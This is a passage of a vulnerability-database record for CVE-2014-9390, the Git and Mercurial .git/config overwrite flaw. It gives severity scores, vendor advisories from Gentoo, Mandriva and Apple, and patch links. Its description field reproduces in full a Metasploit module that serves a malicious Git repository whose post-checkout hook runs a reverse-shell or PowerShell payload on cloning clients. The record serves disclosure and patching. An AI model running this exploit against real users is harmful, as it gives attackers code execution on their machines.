"https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", exploitabilityScore: 10, id: "CVE-2014-9390", impactScore: 6.4, integrityImpact: "PARTIAL", severity: "HIGH", trust: 1.1, vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, { acInsufInfo: null, accessComplexity: "Low", accessVector: "Network", authentication: "None", author: "NVD", availabilityImpact: "Partial", baseScore: 7.5, confidentialityImpact: "Partial", exploitabilityScore: null, id: "JVNDB-2014-008933", impactScore: null, integrityImpact: "Partial", obtainAllPrivilege: null, obtainOtherPrivilege: null, obtainUserPrivilege: null, severity: "High", trust: 0.8, userInteractionRequired: null, vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "VULHUB", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", exploitabilityScore: 10, id: "VHN-77335", impactScore: 6.4, integrityImpact: "PARTIAL", severity: "HIGH", trust: 0.1, vectorString: "AV:N/AC:L/AU:N/C:P/I:P/A:P", version: "2.0", }, ], cvssV3: [ { attackComplexity: "LOW", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "HIGH", baseScore: 9.8, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", exploitabilityScore: 3.9, id: "CVE-2014-9390", impactScore: 5.9, integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", trust: 1, userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, { attackComplexity: "Low", attackVector: "Network", author: "NVD", availabilityImpact: "High", baseScore: 9.8, baseSeverity: "Critical", confidentialityImpact: "High", exploitabilityScore: null, id: "JVNDB-2014-008933", impactScore: null, integrityImpact: "High", privilegesRequired: "None", scope: "Unchanged", trust: 0.8, userInteraction: "None", vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.0", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2014-9390", trust: 1, value: "CRITICAL", }, { author: "NVD", id: "JVNDB-2014-008933", trust: 0.8, value: "Critical", }, { author: "CNNVD", id: "CNNVD-201412-509", trust: 0.6, value: "CRITICAL", }, { author: "VULHUB", id: "VHN-77335", trust: 0.1, value: "HIGH", }, { author: "VULMON", id: "CVE-2014-9390", trust: 0.1, value: "HIGH", }, ], }, ], sources: [ { db: "VULHUB", id: "VHN-77335", }, { db: "VULMON", id: "CVE-2014-9390", }, { db: "JVNDB", id: "JVNDB-2014-008933", }, { db: "CNNVD", id: "CNNVD-201412-509", }, { db: "NVD", id: "CVE-2014-9390", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem. Remote for multiple products Git The server is vulnerable to the execution of arbitrary commands. ..(1) Negligible Unicode Code point, (2) git~1/config Expression, or (3) Cleverly crafted with mixed cases that are improperly processed on case-insensitive filesystems .git/config Arbitrary commands can be executed through the tree containing the files. Git is prone to a vulnerability that may allow attackers to overwrite arbitrary local files. \nSuccessful exploits may allow an attacker to write arbitrary files in the context of the user running the affected application. libgit2 and so on are all products. libgit2 is a portable Git core development package implemented in C language. Apple Xcode, etc. are all products of Apple (Apple). Apple Xcode is an integrated development environment provided to developers, Matt Mackall Mercurial, etc. are all products of Matt Mackall (Matt Mackall) software developers. An input validation error vulnerability exists in several products. The vulnerability stems from the failure of the network system or product to properly validate the input data. \n\nBackground\n==========\n\nGit is a free and open source distributed version control system\ndesigned to handle everything from small to very large projects with\nspeed and efficiency. ##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core'\n\nclass Metasploit4 < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::Powershell\n\n def initialize(info = {})\n super(update_info(\n info,\n 'Name' => 'Malicious Git and Mercurial HTTP Server For CVE-2014-9390',\n 'Description' => %q(\n This module exploits CVE-2014-9390, which affects Git (versions less\n than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions\n less than 3.2.3) and describes three vulnerabilities. \n\n On operating systems which have case-insensitive file systems, like\n Windows and OS X, Git clients can be convinced to retrieve and\n overwrite sensitive configuration files in the .git\n directory which can allow arbitrary code execution if a vulnerable\n client can be convinced to perform certain actions (for example,\n a checkout) against a malicious Git repository. \n\n The third vulnerability with similar characteristics only affects\n Mercurial clients on Windows, where Windows \"short names\"\n (MS-DOS-compatible 8.3 format) are supported. \n\n Today this module only truly supports the first vulnerability (Git\n clients on case-insensitive file systems) but has the functionality to\n support the remaining two with a little work. \n ),\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Jon Hart <jon_hart[at]rapid7.com>' # metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2014-9390'],\n ['URL', 'https://community.rapid7.com/community/metasploit/blog/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial'],\n ['URL', 'http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html'],\n ['URL', 'http://article.gmane.org/gmane.linux.kernel/1853266'],\n ['URL', 'https://github.com/blog/1938-vulnerability-announced-update-your-git-clients'],\n ['URL', 'https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/'],\n ['URL', 'http://mercurial.selenic.com/wiki/WhatsNew#Mercurial_3.2.3_.282014-12-18.29'],\n ['URL', 'http://selenic.com/repo/hg-stable/rev/c02a05cc6f5e'],\n ['URL', 'http://selenic.com/repo/hg-stable/rev/6dad422ecc5a']\n\n ],\n 'DisclosureDate' => 'Dec 18 2014',\n 'Targets' =>\n [\n [\n 'Automatic',\n {\n 'Platform' => [ 'unix' ],\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'Compat' =>\n {\n 'PayloadType' => 'cmd cmd_bash',\n 'RequiredCmd' => 'generic bash-tcp perl bash'\n }\n }\n }\n ],\n [\n 'Windows Powershell',\n {\n 'Platform' => [ 'windows' ],\n 'Arch' => [ARCH_X86, ARCH_X86_64]\n }\n ]\n ],\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('GIT', [true, 'Exploit Git clients', true])\n ]\n )\n\n register_advanced_options(\n [\n OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']),\n OptString.new('MERCURIAL_URI', [false, 'The URI to use as the malicious Mercurial instance (empty for random)', '']),\n OptString.new('GIT_HOOK', [false, 'The Git hook to use for exploitation', 'post-checkout']),\n OptString.new('MERCURIAL_HOOK', [false, 'The Mercurial hook to use for exploitation', 'update']),\n OptBool.new('MERCURIAL', [false, 'Enable experimental Mercurial support', false])\n ]\n )\n end\n\n def setup\n # the exploit requires that we act enough like a real Mercurial HTTP instance,\n # so we keep a mapping of all of the files and the corresponding data we'll\n # send back along with a trigger file that signifies that the git/mercurial\n # client has fetched the malicious content. \n @repo_data = {\n git: { files: {}, trigger: nil },\n mercurial: { files: {}, trigger: nil }\n }\n\n unless datastore['GIT'] || datastore['MERCURIAL']\n fail_with(Exploit::Failure::BadConfig, 'Must specify at least one GIT and/or MERCURIAL')\n end\n\n setup_git\n setup_mercurial\n\n super\n end\n\n def setup_git\n return unless datastore['GIT']\n # URI must start with a /\n unless git_uri && git_uri =~ /^\\//\n fail_with(Exploit::Failure::BadConfig, 'GIT_URI must start with a /')\n end\n # sanity check the malicious hook:\n if datastore['GIT_HOOK'].blank?\n fail_with(Exploit::Failure::BadConfig, 'GIT_HOOK must not be blank')\n end\n\n # In .git/hooks/ directory, specially named files are shell scripts that\n # are executed when particular events occur. For example, if\n # .git/hooks/post-checkout was an executable shell script, a git client\n # would execute that file every time anything is checked out. There are\n # various other files that can be used to achieve similar goals but related\n # to committing, updating, etc. \n #\n # This builds a fake git repository using the knowledge from:\n #\n # http://schacon.github.io/gitbook/7_how_git_stores_objects.html\n # http://schacon.github.io/gitbook/7_browsing_git_objects.html\n case target.name\n when 'Automatic'\n full_cmd = \"#!/bin/sh\\n#{payload.encoded}\\n\"\n when 'Windows Powershell'\n psh = cmd_psh_payload(payload.encoded,\n payload_instance.arch.first,\n remove_comspec: true,\n encode_final_payload: true)\n full_cmd = \"#!/bin/sh\\n#{psh}\"\n end\n\n sha1, content = build_object('blob', full_cmd)\n trigger = \"/objects/#{get_path(sha1)}\"\n @repo_data[:git][:trigger] = trigger\n @repo_data[:git][:files][trigger] = content\n # build tree that points to the blob\n sha1, content = build_object('tree', \"100755 #{datastore['GIT_HOOK']}\\0#{[sha1].pack('H*')}\")\n @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n # build a tree that points to the hooks directory in which the hook lives, called hooks\n sha1, content = build_object('tree', \"40000 hooks\\0#{[sha1].pack('H*')}\")\n @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n # build a tree that points to the partially uppercased .git directory in\n # which hooks live\n variants = []\n %w(g G). each do |g|\n %w(i I).each do |i|\n %w(t T).each do |t|\n git = g + i + t\n variants << git unless git.chars.none? { |c| c == c.upcase }\n end\n end\n end\n git_dir = '.' + variants.sample\n sha1, content = build_object('tree', \"40000 #{git_dir}\\0#{[sha1].pack('H*')}\")\n @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n # build the supposed commit that dropped this file, which has a random user/company\n email = Rex::Text.rand_mail_address\n first, last, company = email.scan(/([^\\.]+)\\.([^\\.]+)@(.*)$/).flatten\n full_name = \"#{first.capitalize} #{last.capitalize}\"\n tstamp = Time.now.to_i\n author_time = rand(tstamp)\n commit_time = rand(author_time)\n tz_off = rand(10)\n commit = \"author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\\n\" \\\n \"committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\\n\" \\\n \"\\n\" \\\n \"Initial commit to open git repository for #{company}!\\n\"\n if datastore['VERBOSE']\n vprint_status(\"Malicious Git commit of #{git_dir}/#{datastore['GIT_HOOK']} is:\")\n commit.each_line { |l| vprint_status(l.strip) }\n end\n sha1, content = build_object('commit', \"tree #{sha1}\\n#{commit}\")\n @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n # build HEAD\n @repo_data[:git][:files]['/HEAD'] = \"ref: refs/heads/master\\n\"\n # lastly, build refs\n @repo_data[:git][:files]['/info/refs'] = \"#{sha1}\\trefs/heads/master\\n\"\n end\n\n def setup_mercurial\n return unless datastore['MERCURIAL']\n # URI must start with a /\n unless mercurial_uri && mercurial_uri =~ /^\\//\n fail_with(Exploit::Failure::BadConfig, 'MERCURIAL_URI must start with a /')\n end\n # sanity check the malicious hook\n if datastore['MERCURIAL_HOOK'].blank?\n fail_with(Exploit::Failure::BadConfig, 'MERCURIAL_HOOK must not be blank')\n end\n # we fake the Mercurial HTTP protocol such that we are compliant as possible but\n # also as simple as possible so that we don't have to support all of the protocol\n # complexities. Taken from:\n # http://mercurial.selenic.com/wiki/HttpCommandProtocol\n # http://selenic.com/hg/file/tip/mercurial/wireproto.py\n @repo_data[:mercurial][:files]['?cmd=capabilities'] = 'heads getbundle=HG10UN'\n fake_sha1 = 'e6c39c507d7079cfff4963a01ea3a195b855d814'\n @repo_data[:mercurial][:files]['?cmd=heads'] = \"#{fake_sha1}\\n\"\n # TODO: properly bundle this using the information in http://mercurial.selenic.com/wiki/BundleFormat\n @repo_data[:mercurial][:files][\"?cmd=getbundle&common=#{'0' * 40}&heads=#{fake_sha1}\"] = Zlib::Deflate.deflate(\"HG10UNfoofoofoo\")\n\n # TODO: finish building the fake repository\n end\n\n # Build's a Git object\n def build_object(type, content)\n # taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html\n header = \"#{type} #{content.size}\\0\"\n store = header + content\n [Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)]\n end\n\n # Returns the Git object path name that a file with the provided SHA1 will reside in\n def get_path(sha1)\n sha1[0...2] + '/' + sha1[2..40]\n end\n\n def exploit\n super\n end\n\n def primer\n # add the git and mercurial URIs as necessary\n if datastore['GIT']\n hardcoded_uripath(git_uri)\n print_status(\"Malicious Git URI is #{URI.parse(get_uri).merge(git_uri)}\")\n end\n if datastore['MERCURIAL']\n hardcoded_uripath(mercurial_uri)\n print_status(\"Malicious Mercurial URI is #{URI.parse(get_uri).merge(mercurial_uri)}\")\n end\n end\n\n # handles routing any request to the mock git, mercurial or simple HTML as necessary\n def on_request_uri(cli, req)\n # if the URI is one of our repositories and the user-agent is that of git/mercurial\n # send back the appropriate data, otherwise just show the HTML version\n if (user_agent = req.headers['User-Agent'])\n if datastore['GIT'] && user_agent =~ /^git\\// && req.uri.start_with?(git_uri)\n do_git(cli, req)\n return\n elsif datastore['MERCURIAL'] && user_agent =~ /^mercurial\\// && req.uri.start_with?(mercurial_uri)\n do_mercurial(cli, req)\n return\n end\n end\n\n do_html(cli, req)\n end\n\n # simulates a Git HTTP server\n def do_git(cli, req)\n # determine if the requested file is something we know how to serve from our\n # fake repository and send it if so\n req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '')\n if @repo_data[:git][:files].key?(req_file)\n vprint_status(\"Sending Git #{req_file}\")\n send_response(cli, @repo_data[:git][:files][req_file])\n if req_file == @repo_data[:git][:trigger]\n vprint_status(\"Trigger!\")\n # Do we need this? If so, how can I update the payload which is in a file which\n # has already been built?\n # regenerate_payload\n handler(cli)\n end\n else\n vprint_status(\"Git #{req_file} doesn't exist\")\n send_not_found(cli)\n end\n end\n\n # simulates an HTTP server with simple HTML content that lists the fake\n # repositories available for cloning\n def do_html(cli, _req)\n resp = create_response\n resp.body = <<HTML\n <html>\n <head><title>Public Repositories</title></head>\n <body>\n <p>Here are our public repositories:</p>\n <ul>\nHTML\n\n if datastore['GIT']\n this_git_uri = URI.parse(get_uri).merge(git_uri)\n resp.body << \"<li><a href=#{git_uri}>Git</a> (clone with `git clone #{this_git_uri}`)</li>\"\n else\n resp.body << \"<li><a>Git</a> (currently offline)</li>\"\n end\n\n if datastore['MERCURIAL']\n this_mercurial_uri = URI.parse(get_uri).merge(mercurial_uri)\n resp.body << \"<li><a href=#{mercurial_uri}>Mercurial</a> (clone with `hg clone #{this_mercurial_uri}`)</li>\"\n else\n resp.body << \"<li><a>Mercurial</a> (currently offline)</li>\"\n end\n resp.body << <<HTML\n </ul>\n </body>\n </html>\nHTML\n\n cli.send_response(resp)\n end\n\n # simulates a Mercurial HTTP server\n def do_mercurial(cli, req)\n # determine if the requested file is something we know how to serve from our\n # fake repository and send it if so\n uri = URI.parse(req.uri)\n req_path = uri.path\n req_path += \"?#{uri.query}\" if uri.query\n req_path.gsub!(/^#{mercurial_uri}/, '')\n if @repo_data[:mercurial][:files].key?(req_path)\n vprint_status(\"Sending Mercurial #{req_path}\")\n send_response(cli, @repo_data[:mercurial][:files][req_path], 'Content-Type' => 'application/mercurial-0.1')\n if req_path == @repo_data[:mercurial][:trigger]\n vprint_status(\"Trigger!\")\n # Do we need this? If so, how can I update the payload which is in a file which\n # has already been built?\n # regenerate_payload\n handler(cli)\n end\n else\n vprint_status(\"Mercurial #{req_path} doesn't exist\")\n send_not_found(cli)\n end\n end\n\n # Returns the value of GIT_URI if not blank, otherwise returns a random .git URI\n def git_uri\n return @git_uri if @git_uri\n if datastore['GIT_URI'].blank?\n @git_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 2).downcase + '.git'\n else\n @git_uri = datastore['GIT_URI']\n end\n end\n\n # Returns the value of MERCURIAL_URI if not blank, otherwise returns a random URI\n def mercurial_uri\n return @mercurial_uri if @mercurial_uri\n if datastore['MERCURIAL_URI'].blank?\n @mercurial_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 6).downcase\n else\n @mercurial_uri = datastore['MERCURIAL_URI']\n end\n end\nend\n. \n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201612-19\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: Mercurial: Multiple vulnerabilities\n Date: December 07, 2016\n Bugs: #533008, #544332, #578546, #582238\n ID: 201612-19\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in Mercurial, the worst of\nwhich could lead to the remote execution of arbitrary code. \n\nBackground\n==========\n\nMercurial is a distributed source control management system. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-vcs/mercurial < 3.8.4 >= 3.8.4\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in Mercurial. Please\nreview the CVE identifier and bug reports referenced for details. \n\nImpact\n======\n\nA remote attacker could possibly execute arbitrary code with the\nprivileges of the process. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll mercurial users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-vcs/mercurial-3.8.4\"\n\nReferences\n==========\n\n[ 1 ] CVE-2014-9390\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9390\n[ 2 ] CVE-2014-9462\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9462\n[ 3 ] CVE-2016-3068\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3068\n[ 4 ] CVE-2016-3069\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3069\n[ 5 ] CVE-2016-3105\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3105\n[ 6 ] CVE-2016-3630\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3630\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201612-19\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users' machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n _______________________________________________________________________\n\n Mandriva Linux Security Advisory MDVSA-2015:169\n http://www.mandriva.com/en/support/security/\n _______________________________________________________________________\n\n Package : git\n Date : March 30, 2015\n Affected: Business Server 2.0\n _______________________________________________________________________\n\n Problem Description:\n\n Updated git packages fix security vulnerability:\n \n It was reported that git, when used as a client on a case-insensitive\n filesystem, could allow the overwrite of the .git/config file when\n the client performed a git pull. Because git permitted committing\n .Git/config (or any case variation), on the pull this would replace the\n user's .git/config. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9390\n http://advisories.mageia.org/MGASA-2014-0546.html\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Business Server 2/X86_64:\n ef3f480ca48a2a9611bd11fa8a045892 mbs2/x86_64/git-1.8.5.6-1.mbs2.x86_64.rpm\n efd3deae08fd17b80008bd3dc881d1f7 mbs2/x86_64/git-arch-1.8.5.6-1.mbs2.x86_64.rpm\n c60432719a43e70eb929c1c75c93fdda mbs2/x86_64/git-core-1.8.5.6-1.mbs2.x86_64.rpm\n 10fb62c0748447bd1b960789125e8d1b mbs2/x86_64/git-core-oldies-1.8.5.6-1.mbs2.x86_64.rpm\n dafec670f61de3e9942a97377b604859 mbs2/x86_64/git-cvs-1.8.5.6-1.mbs2.x86_64.rpm\n 879edb749813e5e175e90c88d2188eb9 mbs2/x86_64/git-email-1.8.5.6-1.mbs2.x86_64.rpm\n 1261450cb657453cd10a055301e42e01 mbs2/x86_64/gitk-1.8.5.6-1.mbs2.x86_64.rpm\n 8b4e493293c55a955e439233ae55ec99 mbs2/x86_64/git-prompt-1.8.5.6-1.mbs2.x86_64.rpm\n 2a4694ce47fe835f532cd7acc734e7b3 mbs2/x86_64/git-svn-1.8.5.6-1.mbs2.x86_64.rpm\n 39c2ff102bf754a4ca9a6d9d70fbc79c mbs2/x86_64/gitview-1.8.5.6-1.mbs2.x86_64.rpm\n 35bb63e42cfe602a24ae790fe3ddbd54 mbs2/x86_64/gitweb-1.8.5.6-1.mbs2.x86_64.rpm\n d464e9766d38928a7fe9510382356724 mbs2/x86_64/lib64git-devel-1.8.5.6-1.mbs2.x86_64.rpm\n 644c0f388c821f9192485494ac3199d5 mbs2/x86_64/perl-Git-1.8.5.6-1.mbs2.x86_64.rpm \n 261134d774a1b833817d8855214a9412 mbs2/SRPMS/git-1.8.5.6-1.mbs2.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n <security*mandriva.com>\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFVGPUcmqjQ0CJFipgRAh4wAKDuznNiViTa2PaV8idvg0tSlPIzMACg7AqX\nAknCsk/2slzIzxNpACLxeDI=\n=Vdej\n-----END PGP SIGNATURE-----\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nAPPLE-SA-2015-03-09-4 Xcode 6.2\n\nXcode 6.2 is now available and addresses the following:\n\nsubversion\nAvailable for: OS X Mavericks v10.9.4 or later\nImpact: Multiple vulnerabilities in Apache Subversion\nDescription: Multiple vulnerabilities existed in Apache Subversion,\nthe most serious of which may have allowed an attacker with a\nprivileged position to spoof SSL servers via a crafted certificate. \nThese issues were addressed by updating Apache Subversion to version\n1.7.19. This issue was\naddressed by adding additional checks. \nCVE-ID\nCVE-2014-9390 : Matt Mackall of Mercurial and Augie Fackler of\nMercurial\n\nXcode 6.2 may be obtained from:\nhttps://developer.apple.com/xcode/downloads/\n\nTo check that the Xcode has been updated:\n\n* Select Xcode in the menu bar\n* Select About Xcode\n* The version after applying this update will be \"6.2\"", sources: [ { db: "NVD", id: "CVE-2014-9390", }, { db: "JVNDB", id: "JVNDB-2014-008933", }, { db: "BID", id: "71732", }, { db: "VULHUB", id: "VHN-77335", }, { db: "VULMON", id: "CVE-2014-9390", }, { db: "PACKETSTORM", id: "129677", }, { db: "PACKETSTORM", id: "133704", }, { db: "PACKETSTORM", id: "129784", }, { db: "PACKETSTORM", id: "140059", }, { db: "PACKETSTORM", id: "131193", }, { db: "PACKETSTORM", id: "130744", }, ], trust: 2.61, }, exploit_availability: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { reference: "https://www.scap.org.cn/vuln/vhn-77335", trust: 0.1, type: "unknown", }, ], sources: [ { db: "VULHUB", id: "VHN-77335", }, ], }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2014-9390", trust: 3.5, }, { db: "SECTRACK", id: "1031404", trust: 1.7, }, { db: "JVNDB", id: "JVNDB-2014-008933", trust: 0.8, }, { db: "CNNVD", id: "CNNVD-201412-509", trust: 0.7, }, { db: "BID", id: "71732", trust: 0.4, }, { db: "PACKETSTORM", id: "131193", trust: 0.2, }, { db: "PACKETSTORM", id: "129784", trust: 0.2, }, { db: "PACKETSTORM", id: "129677", trust: 0.2, }, { db: "PACKETSTORM", id: "133704", trust: 0.2, }, { db: "PACKETSTORM", id: "140059", trust: 0.2, }, { db: "PACKETSTORM", id: "129939", trust: 0.1, }, { db: "VULHUB", id: "VHN-77335", trust: 0.1, }, { db: "VULMON", id: "CVE-2014-9390", trust: 0.1, }, { db: "PACKETSTORM", id: "130744", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-77335", }, { db: "VULMON", id: "CVE-2014-9390", }, { db: "BID", id: "71732", }, { db: "JVNDB", id: "JVNDB-2014-008933", }, { db: "PACKETSTORM", id: "129677", }, { db: "PACKETSTORM", id: "133704", }, { db: "PACKETSTORM", id: "129784", }, { db: "PACKETSTORM", id: "140059", }, { db: "PACKETSTORM", id: "131193", }, { db: "PACKETSTORM", id: "130744", }, { db: "CNNVD", id: "CNNVD-201412-509", }, { db: "NVD", id: "CVE-2014-9390", }, ], }, id: "VAR-202002-0749", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-77335", }, ], trust: 0.01, }, last_update_date: "2024-11-29T20:47:08.213000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "HT204147", trust: 0.8, url: "https://support.apple.com/en-us/HT204147", }, { title: "HT204147", trust: 0.8, url: "https://support.apple.com/ja-jp/HT204147", }, { title: "EGit", trust: 0.8, url: "https://www.eclipse.org/egit/", }, { title: "JGit", trust: 0.8, url: "https://www.eclipse.org/jgit/", }, { title: "Git 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1 and thanking friends in Mercurial land", trust: 0.8, url: "https://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html", }, { title: "Top Page", trust: 0.8, url: "https://libgit2.org/", }, { title: "Release Notes", trust: 0.8, url: "http://mercurial.selenic.com/wiki/WhatsNew", }, { title: "Git Security vulnerabilities", trust: 0.6, url: "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=108063", }, { title: "Debian CVElist Bug Report Logs: CVE-2014-9390: Errors in handling case-sensitive directories allow for remote code execution on pull", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs&qid=3d261960ef416477512c63345482cde6", }, { title: "Ubuntu Security Notice: git vulnerability", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice&qid=USN-2470-1", }, { title: "Debian Security Advisories: DSA-3257-1 mercurial -- security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories&qid=ff84582761ae814b21d648e3e5695a92", }, { title: "Debian CVElist Bug Report Logs: dulwich: CVE-2015-0838: buffer overflow in C implementation of pack apply_delta()", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs&qid=924c567b0c5bfcb8fd430e33e12ece5c", }, { title: "Debian CVElist Bug Report Logs: mercurial: CVE-2014-9462: command injection via sshpeer._validaterepo()", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs&qid=a8fb7f02161f50bfff0ab70ff4eee61e", }, { title: "Debian CVElist Bug Report Logs: dulwich: CVE-2014-9706: does not prevent to write files in commits with invalid paths to working tree", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs&qid=d965cc1cf23195b4ff589e7cb23233d5", }, { title: "Apple: Xcode 6.2", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories&qid=28f88d65a83ee45368f37221b1b4ea8f", }, { title: "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2015", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins&qid=2a43c5799a7dd07d6c0a92a3b040d12f", }, { title: "git_osx_installer", trust: 0.1, url: "https://github.com/timcharper/git_osx_installer ", }, { title: "CVE-2014-9390", trust: 0.1, url: "https://github.com/mmetince/CVE-2014-9390 ", }, ], sources: [ { db: "VULMON", id: "CVE-2014-9390", }, { db: "JVNDB", id: "JVNDB-2014-008933", }, { db: "CNNVD", id: 